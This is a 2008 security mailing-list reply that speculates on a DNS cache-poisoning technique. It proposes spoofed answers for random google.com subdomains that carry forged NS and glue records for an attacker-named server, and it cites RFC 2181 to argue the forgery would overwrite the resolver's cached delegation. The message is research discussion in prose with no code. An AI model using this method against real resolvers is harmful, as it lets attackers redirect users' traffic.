Re: DNS Speculation

[Cedric Blancher <blancher () cartel-securite fr>]

Le mardi 22 juillet 2008 à 02:42 -0700, Alexander Sotirov a écrit :
> Spoofing a A record:
> Right before step 7, the attacker sends a spoofed response from ns.google.com
> that includes an A record for www.google.com and points it to 1.2.3.4 (which is
> an attacker controlled name server). If the attacker does not win the race,
> they just try again with 1235.google.com and so on.

And, what about spoofing 1234.google.com as described everywhere and add
an Authority RR stating that NS record for google.com is
ns.malicious.net, and an Additional one giving A record for
ns.malicious.net ?

According to RFC 2181, section 5.4.1, authority data from an
authoritative answer have a better priority than the ones from a
non-authoritative one. When ns.isp.com is getting NS record from .com
(step 5), it is done through a non-authoritative answer. Therefore, our
successful spoofed answer should update google.com NS record(s) in
ns.isp.com cache


-- 
http://sid.rstack.org/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
> > Hi! I'm your friendly neighbourhood signature virus.
> > Copy me to your signature file and help me spread!
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave